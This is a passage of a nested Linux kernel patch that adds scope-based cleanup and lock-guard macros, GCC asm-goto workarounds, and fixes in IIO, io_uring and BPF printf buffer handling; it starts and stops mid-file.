++	class_##_name##_t var __cleanup(class_##_name##_destructor) =	\
++		class_##_name##_constructor
++
++
++/*
++ * DEFINE_GUARD(name, type, lock, unlock):
++ *	trivial wrapper around DEFINE_CLASS() above specifically
++ *	for locks.
++ *
++ * guard(name):
++ *	an anonymous instance of the (guard) class
++ *
++ * scoped_guard (name, args...) { }:
++ *	similar to CLASS(name, scope)(args), except the variable (with the
++ *	explicit name 'scope') is declard in a for-loop such that its scope is
++ *	bound to the next (compound) statement.
++ *
++ */
++
++#define DEFINE_GUARD(_name, _type, _lock, _unlock) \
++	DEFINE_CLASS(_name, _type, _unlock, ({ _lock; _T; }), _type _T)
++
++#define guard(_name) \
++	CLASS(_name, __UNIQUE_ID(guard))
++
++#define scoped_guard(_name, args...)					\
++	for (CLASS(_name, scope)(args),					\
++	     *done = NULL; !done; done = (void *)1)
++
++/*
++ * Additional helper macros for generating lock guards with types, either for
++ * locks that don't have a native type (eg. RCU, preempt) or those that need a
++ * 'fat' pointer (eg. spin_lock_irqsave).
++ *
++ * DEFINE_LOCK_GUARD_0(name, lock, unlock, ...)
++ * DEFINE_LOCK_GUARD_1(name, type, lock, unlock, ...)
++ *
++ * will result in the following type:
++ *
++ *   typedef struct {
++ *	type *lock;		// 'type := void' for the _0 variant
++ *	__VA_ARGS__;
++ *   } class_##name##_t;
++ *
++ * As above, both _lock and _unlock are statements, except this time '_T' will
++ * be a pointer to the above struct.
++ */
++
++#define __DEFINE_UNLOCK_GUARD(_name, _type, _unlock, ...)		\
++typedef struct {							\
++	_type *lock;							\
++	__VA_ARGS__;							\
++} class_##_name##_t;							\
++									\
++static inline void class_##_name##_destructor(class_##_name##_t *_T)	\
++{									\
++	if (_T->lock) { _unlock; }					\
++}
++
++
++#define __DEFINE_LOCK_GUARD_1(_name, _type, _lock)			\
++static inline class_##_name##_t class_##_name##_constructor(_type *l)	\
++{									\
++	class_##_name##_t _t = { .lock = l }, *_T = &_t;		\
++	_lock;								\
++	return _t;							\
++}
++
++#define __DEFINE_LOCK_GUARD_0(_name, _lock)				\
++static inline class_##_name##_t class_##_name##_constructor(void)	\
++{									\
++	class_##_name##_t _t = { .lock = (void*)1 },			\
++			 *_T __maybe_unused = &_t;			\
++	_lock;								\
++	return _t;							\
++}
++
++#define DEFINE_LOCK_GUARD_1(_name, _type, _lock, _unlock, ...)		\
++__DEFINE_UNLOCK_GUARD(_name, _type, _unlock, __VA_ARGS__)		\
++__DEFINE_LOCK_GUARD_1(_name, _type, _lock)
++
++#define DEFINE_LOCK_GUARD_0(_name, _lock, _unlock, ...)			\
++__DEFINE_UNLOCK_GUARD(_name, void, _unlock, __VA_ARGS__)		\
++__DEFINE_LOCK_GUARD_0(_name, _lock)
++
++#endif /* __LINUX_GUARDS_H */
+diff --git a/include/linux/compiler-clang.h b/include/linux/compiler-clang.h
+index 6cfd6902bd5b9..9b673fefcef8a 100644
+--- a/include/linux/compiler-clang.h
++++ b/include/linux/compiler-clang.h
+@@ -5,6 +5,15 @@
+ 
+ /* Compiler specific definitions for Clang compiler */
+ 
++/*
++ * Clang prior to 17 is being silly and considers many __cleanup() variables
++ * as unused (because they are, their sole purpose is to go out of scope).
++ *
++ * https://reviews.llvm.org/D152180
++ */
++#undef __cleanup
++#define __cleanup(func) __maybe_unused __attribute__((__cleanup__(func)))
++
+ /* same as gcc, this was present in clang-2.6 so we can assume it works
+  * with any version that can compile the kernel
+  */
+diff --git a/include/linux/compiler-gcc.h b/include/linux/compiler-gcc.h
+index f55a37efdb974..149a520515e1d 100644
+--- a/include/linux/compiler-gcc.h
++++ b/include/linux/compiler-gcc.h
+@@ -66,6 +66,26 @@
+ 		__builtin_unreachable();	\
+ 	} while (0)
+ 
++/*
++ * GCC 'asm goto' with outputs miscompiles certain code sequences:
++ *
++ *   https://gcc.gnu.org/bugzilla/show_bug.cgi?id=113921
++ *
++ * Work around it via the same compiler barrier quirk that we used
++ * to use for the old 'asm goto' workaround.
++ *
++ * Also, always mark such 'asm goto' statements as volatile: all
++ * asm goto statements are supposed to be volatile as per the
++ * documentation, but some versions of gcc didn't actually do
++ * that for asms with outputs:
++ *
++ *    https://gcc.gnu.org/bugzilla/show_bug.cgi?id=98619
++ */
++#ifdef CONFIG_GCC_ASM_GOTO_OUTPUT_WORKAROUND
++#define asm_goto_output(x...) \
++	do { asm volatile goto(x); asm (""); } while (0)
++#endif
++
+ #if defined(CONFIG_ARCH_USE_BUILTIN_BSWAP)
+ #define __HAVE_BUILTIN_BSWAP32__
+ #define __HAVE_BUILTIN_BSWAP64__
+diff --git a/include/linux/compiler_attributes.h b/include/linux/compiler_attributes.h
+index 898b3458b24a0..ae4c9579ca5f0 100644
+--- a/include/linux/compiler_attributes.h
++++ b/include/linux/compiler_attributes.h
+@@ -75,6 +75,12 @@
+ # define __assume_aligned(a, ...)
+ #endif
+ 
++/*
++ *   gcc: https://gcc.gnu.org/onlinedocs/gcc/Common-Variable-Attributes.html#index-cleanup-variable-attribute
++ * clang: https://clang.llvm.org/docs/AttributeReference.html#cleanup
++ */
++#define __cleanup(func)			__attribute__((__cleanup__(func)))
++
+ /*
+  *   gcc: https://gcc.gnu.org/onlinedocs/gcc/Common-Function-Attributes.html#index-cold-function-attribute
+  *   gcc: https://gcc.gnu.org/onlinedocs/gcc/Label-Attributes.html#index-cold-label-attribute
+diff --git a/include/linux/compiler_types.h b/include/linux/compiler_types.h
+index eb0466236661f..574b4121ebe3e 100644
+--- a/include/linux/compiler_types.h
++++ b/include/linux/compiler_types.h
+@@ -284,8 +284,15 @@ struct ftrace_likely_data {
+ # define __realloc_size(x, ...)
+ #endif
+ 
+-#ifndef asm_volatile_goto
+-#define asm_volatile_goto(x...) asm goto(x)
++/*
++ * Some versions of gcc do not mark 'asm goto' volatile:
++ *
++ *  https://gcc.gnu.org/bugzilla/show_bug.cgi?id=103979
++ *
++ * We do it here by hand, because it doesn't hurt.
++ */
++#ifndef asm_goto_output
++#define asm_goto_output(x...) asm volatile goto(x)
+ #endif
+ 
+ #ifdef CONFIG_CC_HAS_ASM_INLINE
+diff --git a/include/linux/device.h b/include/linux/device.h
+index 7cf24330d6814..5520bb546a4ac 100644
+--- a/include/linux/device.h
++++ b/include/linux/device.h
+@@ -30,6 +30,7 @@
+ #include <linux/device/bus.h>
+ #include <linux/device/class.h>
+ #include <linux/device/driver.h>
++#include <linux/cleanup.h>
+ #include <asm/device.h>
+ 
+ struct device;
+@@ -898,6 +899,9 @@ void device_unregister(struct device *dev);
+ void device_initialize(struct device *dev);
+ int __must_check device_add(struct device *dev);
+ void device_del(struct device *dev);
++
++DEFINE_FREE(device_del, struct device *, if (_T) device_del(_T))
++
+ int device_for_each_child(struct device *dev, void *data,
+ 			  int (*fn)(struct device *dev, void *data));
+ int device_for_each_child_reverse(struct device *dev, void *data,
+@@ -1071,6 +1075,9 @@ extern int (*platform_notify_remove)(struct device *dev);
+  */
+ struct device *get_device(struct device *dev);
+ void put_device(struct device *dev);
++
++DEFINE_FREE(put_device, struct device *, if (_T) put_device(_T))
++
+ bool kill_device(struct device *dev);
+ 
+ #ifdef CONFIG_DEVTMPFS
+diff --git a/include/linux/file.h b/include/linux/file.h
+index 39704eae83e27..6e9099d293436 100644
+--- a/include/linux/file.h
++++ b/include/linux/file.h
+@@ -10,6 +10,7 @@
+ #include <linux/types.h>
+ #include <linux/posix_types.h>
+ #include <linux/errno.h>
++#include <linux/cleanup.h>
+ 
+ struct file;
+ 
+@@ -80,6 +81,8 @@ static inline void fdput_pos(struct fd f)
+ 	fdput(f);
+ }
+ 
++DEFINE_CLASS(fd, struct fd, fdput(_T), fdget(fd), int fd)
++
+ extern int f_dupfd(unsigned int from, struct file *file, unsigned flags);
+ extern int replace_fd(unsigned fd, struct file *file, unsigned flags);
+ extern void set_close_on_exec(unsigned int fd, int flag);
+@@ -88,6 +91,9 @@ extern int __get_unused_fd_flags(unsigned flags, unsigned long nofile);
+ extern int get_unused_fd_flags(unsigned flags);
+ extern void put_unused_fd(unsigned int fd);
+ 
++DEFINE_CLASS(get_unused_fd, int, if (_T >= 0) put_unused_fd(_T),
++	     get_unused_fd_flags(flags), unsigned flags)
++
+ extern void fd_install(unsigned int fd, struct file *file);
+ 
+ extern int __receive_fd(struct file *file, int __user *ufd,
+diff --git a/include/linux/iio/adc/ad_sigma_delta.h b/include/linux/iio/adc/ad_sigma_delta.h
+index 7852f6c9a714c..719cf9cc6e1ac 100644
+--- a/include/linux/iio/adc/ad_sigma_delta.h
++++ b/include/linux/iio/adc/ad_sigma_delta.h
+@@ -8,6 +8,8 @@
+ #ifndef __AD_SIGMA_DELTA_H__
+ #define __AD_SIGMA_DELTA_H__
+ 
++#include <linux/iio/iio.h>
++
+ enum ad_sigma_delta_mode {
+ 	AD_SD_MODE_CONTINUOUS = 0,
+ 	AD_SD_MODE_SINGLE = 1,
+@@ -99,7 +101,7 @@ struct ad_sigma_delta {
+ 	 * 'rx_buf' is up to 32 bits per sample + 64 bit timestamp,
+ 	 * rounded to 16 bytes to take into account padding.
+ 	 */
+-	uint8_t				tx_buf[4] ____cacheline_aligned;
++	uint8_t				tx_buf[4] __aligned(IIO_DMA_MINALIGN);
+ 	uint8_t				rx_buf[16] __aligned(8);
+ };
+ 
+diff --git a/include/linux/iio/common/st_sensors.h b/include/linux/iio/common/st_sensors.h
+index db4a1b260348c..c34e648f07e28 100644
+--- a/include/linux/iio/common/st_sensors.h
++++ b/include/linux/iio/common/st_sensors.h
+@@ -261,9 +261,9 @@ struct st_sensor_data {
+ 	bool hw_irq_trigger;
+ 	s64 hw_timestamp;
+ 
+-	char buffer_data[ST_SENSORS_MAX_BUFFER_SIZE] ____cacheline_aligned;
+-
+ 	struct mutex odr_lock;
++
++	char buffer_data[ST_SENSORS_MAX_BUFFER_SIZE] __aligned(IIO_DMA_MINALIGN);
+ };
+ 
+ #ifdef CONFIG_IIO_BUFFER
+diff --git a/include/linux/iio/imu/adis.h b/include/linux/iio/imu/adis.h
+index bcbefb7574751..af083aa0c4317 100644
+--- a/include/linux/iio/imu/adis.h
++++ b/include/linux/iio/imu/adis.h
+@@ -11,6 +11,7 @@
+ 
+ #include <linux/spi/spi.h>
+ #include <linux/interrupt.h>
++#include <linux/iio/iio.h>
+ #include <linux/iio/types.h>
+ 
+ #define ADIS_WRITE_REG(reg) ((0x80 | (reg)))
+@@ -131,7 +132,7 @@ struct adis {
+ 	unsigned long		irq_flag;
+ 	void			*buffer;
+ 
+-	u8			tx[10] ____cacheline_aligned;
++	u8			tx[10] __aligned(IIO_DMA_MINALIGN);
+ 	u8			rx[4];
+ };
+ 
+diff --git a/include/linux/init.h b/include/linux/init.h
+index 077d7f93b402f..c96aea3229ca1 100644
+--- a/include/linux/init.h
++++ b/include/linux/init.h
+@@ -87,9 +87,6 @@
+ 						  __latent_entropy
+ #define __meminitdata    __section(".meminit.data")
+ #define __meminitconst   __section(".meminit.rodata")
+-#define __memexit        __section(".memexit.text") __exitused __cold notrace
+-#define __memexitdata    __section(".memexit.data")
+-#define __memexitconst   __section(".memexit.rodata")
+ 
+ /* For assembly routines */
+ #define __HEAD		.section	".head.text","ax"
+diff --git a/include/linux/irqflags.h b/include/linux/irqflags.h
+index 5ec0fa71399e4..2b665c32f5fe6 100644
+--- a/include/linux/irqflags.h
++++ b/include/linux/irqflags.h
+@@ -13,6 +13,7 @@
+ #define _LINUX_TRACE_IRQFLAGS_H
+ 
+ #include <linux/typecheck.h>
++#include <linux/cleanup.h>
+ #include <asm/irqflags.h>
+ #include <asm/percpu.h>
+ 
+@@ -267,4 +268,10 @@ extern void warn_bogus_irq_restore(void);
+ 
+ #define irqs_disabled_flags(flags) raw_irqs_disabled_flags(flags)
+ 
++DEFINE_LOCK_GUARD_0(irq, local_irq_disable(), local_irq_enable())
++DEFINE_LOCK_GUARD_0(irqsave,
++		    local_irq_save(_T->flags),
++		    local_irq_restore(_T->flags),
++		    unsigned long flags)
++
+ #endif
+diff --git a/include/linux/mmc/sdio_ids.h b/include/linux/mmc/sdio_ids.h
+index 74f9d9a6d3307..0e4ef9c5127ad 100644
+--- a/include/linux/mmc/sdio_ids.h
++++ b/include/linux/mmc/sdio_ids.h
+@@ -102,6 +102,7 @@
+ #define SDIO_DEVICE_ID_MARVELL_8977_BT		0x9146
+ #define SDIO_DEVICE_ID_MARVELL_8987_WLAN	0x9149
+ #define SDIO_DEVICE_ID_MARVELL_8987_BT		0x914a
++#define SDIO_DEVICE_ID_MARVELL_8978_WLAN	0x9159
+ 
+ #define SDIO_VENDOR_ID_MEDIATEK			0x037a
+ #define SDIO_DEVICE_ID_MEDIATEK_MT7663		0x7663
+diff --git a/include/linux/mutex.h b/include/linux/mutex.h
+index 8f226d460f51c..a33aa9eb9fc3b 100644
+--- a/include/linux/mutex.h
++++ b/include/linux/mutex.h
+@@ -19,6 +19,7 @@
+ #include <asm/processor.h>
+ #include <linux/osq_lock.h>
+ #include <linux/debug_locks.h>
++#include <linux/cleanup.h>
+ 
+ #ifdef CONFIG_DEBUG_LOCK_ALLOC
+ # define __DEP_MAP_MUTEX_INITIALIZER(lockname)			\
+@@ -219,4 +220,7 @@ extern void mutex_unlock(struct mutex *lock);
+ 
+ extern int atomic_dec_and_mutex_lock(atomic_t *cnt, struct mutex *lock);
+ 
++DEFINE_GUARD(mutex, struct mutex *, mutex_lock(_T), mutex_unlock(_T))
++DEFINE_FREE(mutex, struct mutex *, if (_T) mutex_unlock(_T))
++
+ #endif /* __LINUX_MUTEX_H */
+diff --git a/include/linux/netfilter/ipset/ip_set.h b/include/linux/netfilter/ipset/ip_set.h
+index 72f5ebc5c97a9..0b217d4ae2a48 100644
+--- a/include/linux/netfilter/ipset/ip_set.h
++++ b/include/linux/netfilter/ipset/ip_set.h
+@@ -186,6 +186,8 @@ struct ip_set_type_variant {
+ 	/* Return true if "b" set is the same as "a"
+ 	 * according to the create set parameters */
+ 	bool (*same_set)(const struct ip_set *a, const struct ip_set *b);
++	/* Cancel ongoing garbage collectors before destroying the set*/
++	void (*cancel_gc)(struct ip_set *set);
+ 	/* Region-locking is used */
+ 	bool region_lock;
+ };
+@@ -242,6 +244,8 @@ extern void ip_set_type_unregister(struct ip_set_type *set_type);
+ 
+ /* A generic IP set */
+ struct ip_set {
++	/* For call_cru in destroy */
++	struct rcu_head rcu;
+ 	/* The name of the set */
+ 	char name[IPSET_MAXNAMELEN];
+ 	/* Lock protecting the set data */
+diff --git a/include/linux/percpu.h b/include/linux/percpu.h
+index f1ec5ad1351cc..ba00a49369cae 100644
+--- a/include/linux/percpu.h
++++ b/include/linux/percpu.h
+@@ -8,6 +8,7 @@
+ #include <linux/cpumask.h>
+ #include <linux/pfn.h>
+ #include <linux/init.h>
++#include <linux/cleanup.h>
+ 
+ #include <asm/percpu.h>
+ 
+@@ -128,6 +129,9 @@ extern void __init setup_per_cpu_areas(void);
+ extern void __percpu *__alloc_percpu_gfp(size_t size, size_t align, gfp_t gfp) __alloc_size(1);
+ extern void __percpu *__alloc_percpu(size_t size, size_t align) __alloc_size(1);
+ extern void free_percpu(void __percpu *__pdata);
++
++DEFINE_FREE(free_percpu, void __percpu *, free_percpu(_T))
++
+ extern phys_addr_t per_cpu_ptr_to_phys(void *addr);
+ 
+ #define alloc_percpu_gfp(type, gfp)					\
+diff --git a/include/linux/preempt.h b/include/linux/preempt.h
+index 8cfcc5d454512..9aa6358a1a16b 100644
+--- a/include/linux/preempt.h
++++ b/include/linux/preempt.h
+@@ -8,6 +8,7 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <linux/cleanup.h>
+ #include <linux/list.h>
+ 
+ /*
+@@ -474,4 +475,8 @@ static __always_inline void preempt_enable_nested(void)
+ 		preempt_enable();
+ }
+ 
++DEFINE_LOCK_GUARD_0(preempt, preempt_disable(), preempt_enable())
++DEFINE_LOCK_GUARD_0(preempt_notrace, preempt_disable_notrace(), preempt_enable_notrace())
++DEFINE_LOCK_GUARD_0(migrate, migrate_disable(), migrate_enable())
++
+ #endif /* __LINUX_PREEMPT_H */
+diff --git a/include/linux/rcupdate.h b/include/linux/rcupdate.h
+index 46bd9a331fd5d..d2507168b9c7b 100644
+--- a/include/linux/rcupdate.h
++++ b/include/linux/rcupdate.h
+@@ -27,6 +27,7 @@
+ #include <linux/preempt.h>
+ #include <linux/bottom_half.h>
+ #include <linux/lockdep.h>
++#include <linux/cleanup.h>
+ #include <asm/processor.h>
+ #include <linux/cpumask.h>
+ #include <linux/context_tracking_irq.h>
+@@ -1077,4 +1078,6 @@ rcu_head_after_call_rcu(struct rcu_head *rhp, rcu_callback_t f)
+ extern int rcu_expedited;
+ extern int rcu_normal;
+ 
++DEFINE_LOCK_GUARD_0(rcu, rcu_read_lock(), rcu_read_unlock())
++
+ #endif /* __LINUX_RCUPDATE_H */
+diff --git a/include/linux/rwsem.h b/include/linux/rwsem.h
+index efa5c324369a2..1dd530ce8b45b 100644
+--- a/include/linux/rwsem.h
++++ b/include/linux/rwsem.h
+@@ -15,6 +15,7 @@
+ #include <linux/spinlock.h>
+ #include <linux/atomic.h>
+ #include <linux/err.h>
++#include <linux/cleanup.h>
+ 
+ #ifdef CONFIG_DEBUG_LOCK_ALLOC
+ # define __RWSEM_DEP_MAP_INIT(lockname)			\
+@@ -201,6 +202,13 @@ extern void up_read(struct rw_semaphore *sem);
+  */
+ extern void up_write(struct rw_semaphore *sem);
+ 
++DEFINE_GUARD(rwsem_read, struct rw_semaphore *, down_read(_T), up_read(_T))
++DEFINE_GUARD(rwsem_write, struct rw_semaphore *, down_write(_T), up_write(_T))
++
++DEFINE_FREE(up_read, struct rw_semaphore *, if (_T) up_read(_T))
++DEFINE_FREE(up_write, struct rw_semaphore *, if (_T) up_write(_T))
++
++
+ /*
+  * downgrade write lock to read lock
+  */
+diff --git a/include/linux/sched/task.h b/include/linux/sched/task.h
+index 7291fb6399d2a..aaa25ed1a8fe0 100644
+--- a/include/linux/sched/task.h
++++ b/include/linux/sched/task.h
+@@ -145,6 +145,8 @@ static inline void put_task_struct(struct task_struct *t)
+ 		__put_task_struct(t);
+ }
+ 
++DEFINE_FREE(put_task, struct task_struct *, if (_T) put_task_struct(_T))
++
+ static inline void put_task_struct_many(struct task_struct *t, int nr)
+ {
+ 	if (refcount_sub_and_test(nr, &t->usage))
+diff --git a/include/linux/slab.h b/include/linux/slab.h
+index 45efc6c553b82..cb4b5deca9a9c 100644
+--- a/include/linux/slab.h
++++ b/include/linux/slab.h
+@@ -17,6 +17,7 @@
+ #include <linux/types.h>
+ #include <linux/workqueue.h>
+ #include <linux/percpu-refcount.h>
++#include <linux/cleanup.h>
+ 
+ 
+ /*
+@@ -197,6 +198,8 @@ void kfree(const void *objp);
+ void kfree_sensitive(const void *objp);
+ size_t __ksize(const void *objp);
+ 
++DEFINE_FREE(kfree, void *, if (_T) kfree(_T))
++
+ /**
+  * ksize - Report actual allocation size of associated object
+  *
+diff --git a/include/linux/spinlock.h b/include/linux/spinlock.h
+index 1341f7d62da44..83377540c369a 100644
+--- a/include/linux/spinlock.h
++++ b/include/linux/spinlock.h
+@@ -61,6 +61,7 @@
+ #include <linux/stringify.h>
+ #include <linux/bottom_half.h>
+ #include <linux/lockdep.h>
++#include <linux/cleanup.h>
+ #include <asm/barrier.h>
+ #include <asm/mmiowb.h>
+ 
+@@ -493,5 +494,35 @@ int __alloc_bucket_spinlocks(spinlock_t **locks, unsigned int *lock_mask,
+ 
+ void free_bucket_spinlocks(spinlock_t *locks);
+ 
++DEFINE_LOCK_GUARD_1(raw_spinlock, raw_spinlock_t,
++		    raw_spin_lock(_T->lock),
++		    raw_spin_unlock(_T->lock))
++
++DEFINE_LOCK_GUARD_1(raw_spinlock_nested, raw_spinlock_t,
++		    raw_spin_lock_nested(_T->lock, SINGLE_DEPTH_NESTING),
++		    raw_spin_unlock(_T->lock))
++
++DEFINE_LOCK_GUARD_1(raw_spinlock_irq, raw_spinlock_t,
++		    raw_spin_lock_irq(_T->lock),
++		    raw_spin_unlock_irq(_T->lock))
++
++DEFINE_LOCK_GUARD_1(raw_spinlock_irqsave, raw_spinlock_t,
++		    raw_spin_lock_irqsave(_T->lock, _T->flags),
++		    raw_spin_unlock_irqrestore(_T->lock, _T->flags),
++		    unsigned long flags)
++
++DEFINE_LOCK_GUARD_1(spinlock, spinlock_t,
++		    spin_lock(_T->lock),
++		    spin_unlock(_T->lock))
++
++DEFINE_LOCK_GUARD_1(spinlock_irq, spinlock_t,
++		    spin_lock_irq(_T->lock),
++		    spin_unlock_irq(_T->lock))
++
++DEFINE_LOCK_GUARD_1(spinlock_irqsave, spinlock_t,
++		    spin_lock_irqsave(_T->lock, _T->flags),
++		    spin_unlock_irqrestore(_T->lock, _T->flags),
++		    unsigned long flags)
++
+ #undef __LINUX_INSIDE_SPINLOCK_H
+ #endif /* __LINUX_SPINLOCK_H */
+diff --git a/include/linux/srcu.h b/include/linux/srcu.h
+index 01226e4d960a0..f9e1fa7ff86fc 100644
+--- a/include/linux/srcu.h
++++ b/include/linux/srcu.h
+@@ -212,4 +212,9 @@ static inline void smp_mb__after_srcu_read_unlock(void)
+ 	/* __srcu_read_unlock has smp_mb() internally so nothing to do here. */
+ }
+ 
++DEFINE_LOCK_GUARD_1(srcu, struct srcu_struct,
++		    _T->idx = srcu_read_lock(_T->lock),
++		    srcu_read_unlock(_T->lock, _T->idx),
++		    int idx)
++
+ #endif
+diff --git a/include/net/tls.h b/include/net/tls.h
+index c36bf4c50027e..899c863aba02c 100644
+--- a/include/net/tls.h
++++ b/include/net/tls.h
+@@ -108,9 +108,6 @@ struct tls_sw_context_tx {
+ 	struct tls_rec *open_rec;
+ 	struct list_head tx_list;
+ 	atomic_t encrypt_pending;
+-	/* protect crypto_wait with encrypt_pending */
+-	spinlock_t encrypt_compl_lock;
+-	int async_notify;
+ 	u8 async_capable:1;
+ 
+ #define BIT_TX_SCHEDULED	0
+@@ -147,8 +144,6 @@ struct tls_sw_context_rx {
+ 	struct tls_strparser strp;
+ 
+ 	atomic_t decrypt_pending;
+-	/* protect crypto_wait with decrypt_pending*/
+-	spinlock_t decrypt_compl_lock;
+ 	struct sk_buff_head async_hold;
+ 	struct wait_queue_head wq;
+ };
+diff --git a/init/Kconfig b/init/Kconfig
+index 148704640252e..ffb927bf6034f 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -89,6 +89,15 @@ config CC_HAS_ASM_GOTO_TIED_OUTPUT
+ 	# Detect buggy gcc and clang, fixed in gcc-11 clang-14.
+ 	def_bool $(success,echo 'int foo(int *x) { asm goto (".long (%l[bar]) - .": "+m"(*x) ::: bar); return *x; bar: return 0; }' | $CC -x c - -c -o /dev/null)
+ 
++config GCC_ASM_GOTO_OUTPUT_WORKAROUND
++	bool
++	depends on CC_IS_GCC && CC_HAS_ASM_GOTO_OUTPUT
++	# Fixed in GCC 14, 13.3, 12.4 and 11.5
++	# https://gcc.gnu.org/bugzilla/show_bug.cgi?id=113921
++	default y if GCC_VERSION < 110500
++	default y if GCC_VERSION >= 120000 && GCC_VERSION < 120400
++	default y if GCC_VERSION >= 130000 && GCC_VERSION < 130300
++
+ config TOOLS_SUPPORT_RELR
+ 	def_bool $(success,env "CC=$(CC)" "LD=$(LD)" "NM=$(NM)" "OBJCOPY=$(OBJCOPY)" $(srctree)/scripts/tools-support-relr.sh)
+ 
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 618ab186fe036..c062ce66af12c 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -1326,7 +1326,7 @@ int io_accept(struct io_kiocb *req, unsigned int issue_flags)
+ 			 * has already been done
+ 			 */
+ 			if (issue_flags & IO_URING_F_MULTISHOT)
+-				ret = IOU_ISSUE_SKIP_COMPLETE;
++				return IOU_ISSUE_SKIP_COMPLETE;
+ 			return ret;
+ 		}
+ 		if (ret == -ERESTARTSYS)
+@@ -1350,7 +1350,8 @@ int io_accept(struct io_kiocb *req, unsigned int issue_flags)
+ 	if (io_post_aux_cqe(ctx, req->cqe.user_data, ret, IORING_CQE_F_MORE, false))
+ 		goto retry;
+ 
+-	return -ECANCELED;
++	io_req_set_res(req, ret, 0);
++	return IOU_STOP_MULTISHOT;
+ }
+ 
+ int io_socket_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+diff --git a/kernel/bpf/helpers.c b/kernel/bpf/helpers.c
+index 34135fbd6097e..6a61a98d602cd 100644
+--- a/kernel/bpf/helpers.c
++++ b/kernel/bpf/helpers.c
+@@ -753,19 +753,20 @@ static int bpf_trace_copy_string(char *buf, void *unsafe_ptr, char fmt_ptype,
+ /* Per-cpu temp buffers used by printf-like helpers to store the bprintf binary
+  * arguments representation.
+  */
+-#define MAX_BPRINTF_BUF_LEN	512
++#define MAX_BPRINTF_BIN_ARGS	512
+ 
+ /* Support executing three nested bprintf helper calls on a given CPU */
+ #define MAX_BPRINTF_NEST_LEVEL	3
+ struct bpf_bprintf_buffers {
+-	char tmp_bufs[MAX_BPRINTF_NEST_LEVEL][MAX_BPRINTF_BUF_LEN];
++	char bin_args[MAX_BPRINTF_BIN_ARGS];
++	char buf[MAX_BPRINTF_BUF];
+ };
+-static DEFINE_PER_CPU(struct bpf_bprintf_buffers, bpf_bprintf_bufs);
++
++static DEFINE_PER_CPU(struct bpf_bprintf_buffers[MAX_BPRINTF_NEST_LEVEL], bpf_bprintf_bufs);
+ static DEFINE_PER_CPU(int, bpf_bprintf_nest_level);
+ 
+-static int try_get_fmt_tmp_buf(char **tmp_buf)
++static int try_get_buffers(struct bpf_bprintf_buffers **bufs)
+ {
+-	struct bpf_bprintf_buffers *bufs;
+ 	int nest_level;
+ 
+ 	preempt_disable();
+@@ -775,18 +776,19 @@ static int try_get_fmt_tmp_buf(char **tmp_buf)
+ 		preempt_enable();
+ 		return -EBUSY;
+ 	}
+-	bufs = this_cpu_ptr(&bpf_bprintf_bufs);
+-	*tmp_buf = bufs->tmp_bufs[nest_level - 1];
++	*bufs = this_cpu_ptr(&bpf_bprintf_bufs[nest_level - 1]);
+ 
+ 	return 0;
+ }
+ 
+-void bpf_bprintf_cleanup(void)
++void bpf_bprintf_cleanup(struct bpf_bprintf_data *data)
+ {
+-	if (this_cpu_read(bpf_bprintf_nest_level)) {
+-		this_cpu_dec(bpf_bprintf_nest_level);
+-		preempt_enable();
+-	}
++	if (!data->bin_args && !data->buf)
++		return;
++	if (WARN_ON_ONCE(this_cpu_read(bpf_bprintf_nest_level) == 0))
++		return;
++	this_cpu_dec(bpf_bprintf_nest_level);
++	preempt_enable();
+ }
+ 
+ /*
+@@ -795,18 +797,20 @@ void bpf_bprintf_cleanup(void)
+  * Returns a negative value if fmt is an invalid format string or 0 otherwise.
+  *
+  * This can be used in two ways:
+- * - Format string verification only: when bin_args is NULL
++ * - Format string verification only: when data->get_bin_args is false
+  * - Arguments preparation: in addition to the above verification, it writes in
+- *   bin_args a binary representation of arguments usable by bstr_printf where
+- *   pointers from BPF have been sanitized.
++ *   data->bin_args a binary representation of arguments usable by bstr_printf
++ *   where pointers from BPF have been sanitized.
+  *
+  * In argument preparation mode, if 0 is returned, safe temporary buffers are
+  * allocated and bpf_bprintf_cleanup should be called to free them after use.
+  */
+ int bpf_bprintf_prepare(char *fmt, u32 fmt_size, const u64 *raw_args,
+-			u32 **bin_args, u32 num_args)
++			u32 num_args, struct bpf_bprintf_data *data)
+ {
++	bool get_buffers = (data->get_bin_args && num_args) || data->get_buf;
+ 	char *unsafe_ptr = NULL, *tmp_buf = NULL, *tmp_buf_end, *fmt_end;
++	struct bpf_bprintf_buffers *buffers = NULL;
+ 	size_t sizeof_cur_arg, sizeof_cur_ip;
+ 	int err, i, num_spec = 0;
+ 	u64 cur_arg;
+@@ -817,14 +821,19 @@ int bpf_bprintf_prepare(char *fmt, u32 fmt_size, const u64 *raw_args,
+ 		return -EINVAL;
+ 	fmt_size = fmt_end - fmt;
+ 
+-	if (bin_args) {
+-		if (num_args && try_get_fmt_tmp_buf(&tmp_buf))
+-			return -EBUSY;
++	if (get_buffers && try_get_buffers(&buffers))
++		return -EBUSY;
+ 
+-		tmp_buf_end = tmp_buf + MAX_BPRINTF_BUF_LEN;
+-		*bin_args = (u32 *)tmp_buf;
++	if (data->get_bin_args) {
++		if (num_args)
++			tmp_buf = buffers->bin_args;
++		tmp_buf_end = tmp_buf + MAX_BPRINTF_BIN_ARGS;
++		data->bin_args = (u32 *)tmp_buf;
+ 	}
+ 
++	if (data->get_buf)
++		data->buf = buffers->buf;
++
+ 	for (i = 0; i < fmt_size; i++) {
+ 		if ((!isprint(fmt[i]) && !isspace(fmt[i])) || !isascii(fmt[i])) {
+ 			err = -EINVAL;
+@@ -1018,31 +1027,33 @@ int bpf_bprintf_prepare(char *fmt, u32 fmt_size, const u64 *raw_args,
+ 	err = 0;
+ out:
+ 	if (err)
+-		bpf_bprintf_cleanup();
++		bpf_bprintf_cleanup(data);
+ 	return err;
+ }
+ 
+ BPF_CALL_5(bpf_snprintf, char *, str, u32, str_size, char *, fmt,
+-	   const void *, data, u32, data_len)
++	   const void *, args, u32, data_len)
+ {
++	struct bpf_bprintf_data data = {
++		.get_bin_args	= true,
++	};
+ 	int err, num_args;
+-	u32 *bin_args;
+ 
+ 	if (data_len % 8 || data_len > MAX_BPRINTF_VARARGS * 8 ||
+-	    (data_len && !data))
++	    (data_len && !args))
+ 		return -EINVAL;
+ 	num_args = data_len / 8;
+ 
+ 	/* ARG_PTR_TO_CONST_STR guarantees that fmt is zero-terminated so we
+ 	 * can safely give an unbounded size.
+ 	 */
+-	err = bpf_bprintf_prepare(fmt, UINT_MAX, data, &bin_args, num_args);
